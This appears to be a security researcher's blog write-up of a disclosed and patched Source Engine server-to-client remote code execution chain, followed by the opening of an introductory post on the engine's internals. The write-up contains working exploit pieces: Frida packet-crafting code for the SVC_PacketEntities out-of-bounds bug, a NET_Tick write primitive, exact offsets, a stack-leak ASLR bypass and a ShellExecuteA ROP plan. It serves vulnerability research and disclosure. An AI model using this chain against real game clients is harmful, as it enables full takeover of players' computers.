The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check that this value is sane and crash the game if it weren’t. But this is not what happens in practice: Assert statements are not compiled into release builds of the game at all. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. Since m_EntityCacheInfo is at a static global offset, we can easily calculate the proper value of entnum for our exploit by locating the offset of m_EntityCacheInfo in any given version of client.dll and working out which entnum produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability require that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, so that its m_pszString is aligned correctly for GetClientNetworkable to return it.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means that to calculate the address of m_pszString, we add 0x1C: 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an offset aligned to 4 (0xC580B4). So, now we can check if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist itself is only aligned to a 0x04 boundary, which adds an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.
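
As a compact C sketch (hypothetical names; the slot 6 and offset 24 values come from the analysis above), the client-side dereference chain is:

#include <cstdint>

// sv_mumble_positionalaudio's string value, fully server-controlled via replication
char* m_pszString;
// g_ClientGlobalVariables->tickcount, set by the crafted NET_Tick message
uint32_t tickcount;

void DereferenceChainSketch()
{
    // entnum was chosen so GetClientNetworkable() returns the value of m_pszString
    uint8_t* pEnt = (uint8_t*)m_pszString;

    // the first 4 bytes of the replicated string are treated as the vtable pointer;
    // the server set them to (&tickcount - 24) ...
    uint8_t* vtable = *(uint8_t**)pEnt;

    // ... so vtable slot 6 (offset 24) lands exactly on tickcount,
    uint32_t fn = *(uint32_t*)(vtable + 24);

    // which holds the stack pivot address the server sent: EIP is now ours.
    ((void (*)())(uintptr_t)fn)();
}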

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload it to the server.
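
A minimal demonstration of why the check passes; the 16 MB limit here is just an assumed example value for net_maxfilesize:

#include <cstdio>

int main()
{
    int net_maxfilesize = 16;               // assumed limit in MB, purely for illustration
    int totalBytes      = (int)0xFFFFF000;  // "size" read straight from the hacked ZIP header

    // Signed comparison: a negative totalBytes is always below the limit.
    if (totalBytes >= net_maxfilesize * 1024 * 1024)
        printf("rejected: size exceeds net_maxfilesize limit\n");
    else
        printf("accepted: %d bytes, the upload goes ahead\n", totalBytes);
}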

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read the contents of the file in 0x100-sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on the stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 bytes of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack, as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely, as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4), therefore it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet, sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll, so the pointer sv_downloadurl->m_pszString is now at an attacker-known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker-controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain will load the necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the user’s files and data.

And there you have it. This entire exploitation happens automatically, using Frida to inject into the dedicated server process and instrument it to perform all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action; be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this; it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than that of Source. There hasn’t been too much public research on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit were very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kinds of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third-generation derivative of the famous Quake engine from 1996 and Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series in history, including Half-Life, Team Fortress, Portal, and Counter-Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for current versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time-consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consist of two separate parts: the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where they are executed. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. ConVars are typically used for configuration, and certain special ConVars will be synchronized between the server and client. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and these custom formats are fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full-chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a critical shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build-breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different from what you would find in a beginner-level CTF challenge. But, unlike a CTF, the implication of a full client machine compromise in a series of games with a huge player base is what leads to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

